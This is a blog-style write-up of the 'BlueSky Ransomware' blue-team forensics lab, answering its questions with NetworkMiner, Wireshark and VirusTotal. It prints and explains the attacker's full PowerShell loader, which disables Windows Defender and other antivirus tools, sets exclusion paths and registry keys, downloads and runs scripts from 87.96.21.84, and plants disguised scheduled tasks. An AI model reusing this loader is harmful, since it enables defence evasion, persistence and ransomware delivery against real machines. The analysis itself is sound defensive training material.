BlueSky Ransomware Blue Team Lab

Network Forensics lab

1-To detect the IP Which That Responsible for the port scanning i used the same Criteria which is open the Requests HTTP tab and easily detect it the first IP made a lot of requests and all of it seems suspicious always makes your eyes see quickly what happen to easily and smoothly predict what should you do in the next move

2-To determine the account targeted username the easiest way is to open network miner and discover the Credentials is The tab in network miner which is show us directly which account is targeted "defend smarter not harder"

3- To detect the password i use the same way for the username

4- To identify which the setting the attacker changes i open Network Miner parameters section and there is a RECONFIGURE parameter and the bellow query show the changes was happen which is the "xp_cmdshell"

5-To detect the process injection i check the event viewer and start to open every event and read the details until i found the Host-name=MSFConsole it is our lover metasploit so detect the Host Application Which is the one of the devils in our story

5-To get The file that the attacker attempt to download i add the attacker ip as filter + request method get

6-To understand which SID the script checked i think it`s a perfect time to understand what is the script is do

The scripts works to determine a lot of things in the same time in overview

Determine Privilege Level: Checks if the script is running with administrative privileges.
Determine OS Version: Retrieves the major version of the operating system.
Set Error Preferences: Configures error handling to suppress warnings and errors.
Define URL: Specifies a URL to interact with.
Test URL Reachability: Checks if specified URLs are reachable.
Stop Antivirus Services: Attempts to disable Windows Defender and other antivirus services.
Download and Schedule Tasks: Downloads additional scripts and schedules them to run periodically.

let`s hold it in details

1-Privilege and OS Version Check

$priv = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")
$osver = ([environment]::OSVersion.Version).Major

$priv: Checks if the current user belongs to the Administrators group.
$osver: Gets the major version of the OS.

Set Error Preferences

$WarningPreference = "SilentlyContinue"
$ErrorActionPreference = "SilentlyContinue"
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }

Suppresses warnings and errors.
Ignores SSL certificate validation errors.

Define URL and Helper Functions

$url = "http://87.96.21.84"

defines a base URL for further interactions.

test-URL Function

Function Test-ScriptURL {
    param ([string]$scriptUrl)
    try {
        $request = Invoke-WebRequest -Uri $scriptUrl -UseBasicParsing -TimeoutSec 5 -ErrorAction Stop
        if ($request.StatusCode -eq 200) {
            return $true
        } else {
            return $false
        }
    } catch {
        return $false
    }
}

Similar to Test-URL, but specifically checks the reachability of the script URL.

Stop Antivirus Services

Function StopAV {
    if ($osver -eq "10") {
        Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
    }
    Function Disable-WindowsDefender {
        if ($osver -eq "10") {
            Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
            Set-MpPreference -ExclusionPath "C:\ProgramData\Oracle" -ErrorAction SilentlyContinue
            Set-MpPreference -ExclusionPath "C:\ProgramData\Oracle\Java" -ErrorAction SilentlyContinue
            Set-MpPreference -ExclusionPath "C:\Windows" -ErrorAction SilentlyContinue

            $defenderRegistryPath = "HKLM:\SOFTWARE\Microsoft\Windows Defender"
            $defenderRegistryKeys = @(
                "DisableAntiSpyware",
                "DisableRoutinelyTakingAction",
                "DisableRealtimeMonitoring",
                "SubmitSamplesConsent",
                "SpynetReporting"
            )

            if (-not (Test-Path $defenderRegistryPath)) {
                New-Item -Path $defenderRegistryPath -Force | Out-Null
            }

            foreach ($key in $defenderRegistryKeys) {
                Set-ItemProperty -Path $defenderRegistryPath -Name $key -Value 1 -ErrorAction SilentlyContinue
            }

            Get-Service WinDefend | Stop-Service -Force -ErrorAction SilentlyContinue
            Set-Service WinDefend -StartupType Disabled -ErrorAction SilentlyContinue
        }
    }

    $servicesToStop = "MBAMService", "MBAMProtection", "*Sophos*"
    foreach ($service in $servicesToStop) {
        Get-Service | Where-Object { $_.DisplayName -like $service } | ForEach-Object {
            Stop-Service $_ -ErrorAction SilentlyContinue
            Set-Service $_ -StartupType Disabled -ErrorAction SilentlyContinue
        }
    }
}

Attempts to disable Windows Defender and other antivirus services if the OS is Windows 10.

CleanerEtc and CleanerNoPriv Functions

Function CleanerEtc {
    $WebClient = New-Object System.Net.WebClient
    $WebClient.DownloadFile("http://87.96.21.84/del.ps1", "C:\ProgramData\del.ps1") | Out-Null
    C:\Windows\System32\schtasks.exe /f /tn "\Microsoft\Windows\MUI\LPupdate" /tr "C:\Windows\System32\cmd.exe /c powershell -ExecutionPolicy Bypass -File C:\ProgramData\del.ps1" /ru SYSTEM /sc HOURLY /mo 4 /create | Out-Null
    Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('http://87.96.21.84/ichigo-lite.ps1'))
}

Function CleanerNoPriv {
    $WebClient = New-Object System.Net.WebClient
    $WebClient.DownloadFile("http://87.96.21.84/del.ps1", "C:\Users\del.ps1") | Out-Null
    C:\Windows\System32\schtasks.exe /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237" /sc HOURLY /f /mo 3 /tr "C:\Windows\System32\cmd.exe /c powershell -ExecutionPolicy Bypass C:\Users\del.ps1" | Out-Null
}

Main Script Logic

$scriptUrl = "http://87.96.21.84/del.ps1"

if (Test-URL -url $url) {
    Write-Host "Connection to $url successful. Proceeding with execution."
    
    if (Test-ScriptURL -scriptUrl $scriptUrl) {
        Write-Host "Script at $scriptUrl is reachable."

        if ($priv) {
            CleanerEtc

            $encodedDiscovery = "SW52b2tlLUV4cHJlc3Npb24gIndob2FtaSI="
            $decodedDiscovery = [System.Convert]::FromBase64String($encodedDiscovery)
            $commandDiscovery = [System.Text.Encoding]::UTF8.GetString($decodedDiscovery)
            powershell -exec bypass -w 1 $commandDiscovery

            Write-Host "Privilege level: SYSTEM"
        } else {
            CleanerNoPriv
            Write-Host "Privilege level: User"
        }
    } else {
        Write-Host "Script at $scriptUrl is not reachable. Terminating."
        exit
    }
} else {
    Write-Host "Connection to $url failed. Terminating."
    exit
}

if ($priv -eq $true) {
    try {
        StopAV
    } catch {}
    Start-Sleep -Seconds 1
    CleanerEtc
} else {
    CleanerNoPriv
}

Checks Connectivity: If the base URL is reachable, it proceeds; otherwise, it terminates.
Checks Script Availability: If the script URL is reachable, it continues based on the privilege level.
- Privileged User: Executes CleanerEtc and a base64-decoded command (Invoke-Expression "whoami").
- Non-Privileged User: Executes CleanerNoPriv.
Disables AV: If privileged, attempts to disable antivirus services before running the cleaner functions again.

so after explain the script we can determine the SUID

8-To determine the registry keys used i go to the Function StopAV in the script and determine the keys

9-The Second Download URL is firstly appear in CleanerETC function

10-After Analysis the script everything will be easy in the function CleanerETC we can determine that the precestince task

11- The Second script is del.ps1 and i determine it with two ways the same filter in wireshark and networkminer after analysis this script the most important thing from my view is Stop-Process Command which is directly Defend_Evasion according to Mitre

stop-process $pid -Force

And Very recommend to read the technique at Mitre https://attack.mitre.org/tactics/TA0005/

12-From the first question when i check the connection the Invoked script light up my eyes btw

13- When i was looking for the dumbed password name i tricked by this damn file but after look for the next script it is here LOL

14- Now it is the time of this tricky file BTW

15-To Know the Dropped ransomware file name i used virus total after upload the hash of the malware on it

16- And the Family name is also VirusTotal

Very nice lab with a lot of details but very Helpful thank you for Reading (:

PreviousWebStrike Blue Team Lab NextPsExec Hunt Blue Team Lab

Last updated 1 year ago

hashtag2-To determine the account targeted username the easiest way is to open network miner and discover the Credentials is The tab in network miner which is show us directly which account is targeted "defend smarter not harder"

hashtag3- To detect the password i use the same way for the username

hashtag4- To identify which the setting the attacker changes i open Network Miner parameters section and there is a RECONFIGURE parameter and the bellow query show the changes was happen which is the "xp_cmdshell"

hashtag5-To detect the process injection i check the event viewer and start to open every event and read the details until i found the Host-name=MSFConsole it is our lover metasploit so detect the Host Application Which is the one of the devils in our story

hashtag5-To get The file that the attacker attempt to download i add the attacker ip as filter + request method get

hashtag6-To understand which SID the script checked i think it`s a perfect time to understand what is the script is do

hashtag8-To determine the registry keys used i go to the Function StopAV in the script and determine the keys

hashtag9-The Second Download URL is firstly appear in CleanerETC function

hashtag10-After Analysis the script everything will be easy in the function CleanerETC we can determine that the precestince task

hashtag11- The Second script is del.ps1 and i determine it with two ways the same filter in wireshark and networkminer after analysis this script the most important thing from my view is Stop-Process Command which is directly Defend_Evasion according to Mitre

hashtag12-From the first question when i check the connection the Invoked script light up my eyes btw

hashtag13- When i was looking for the dumbed password name i tricked by this damn file but after look for the next script it is here LOL

hashtag14- Now it is the time of this tricky file BTW

hashtag15-To Know the Dropped ransomware file name i used virus total after upload the hash of the malware on it

hashtag16- And the Family name is also VirusTotal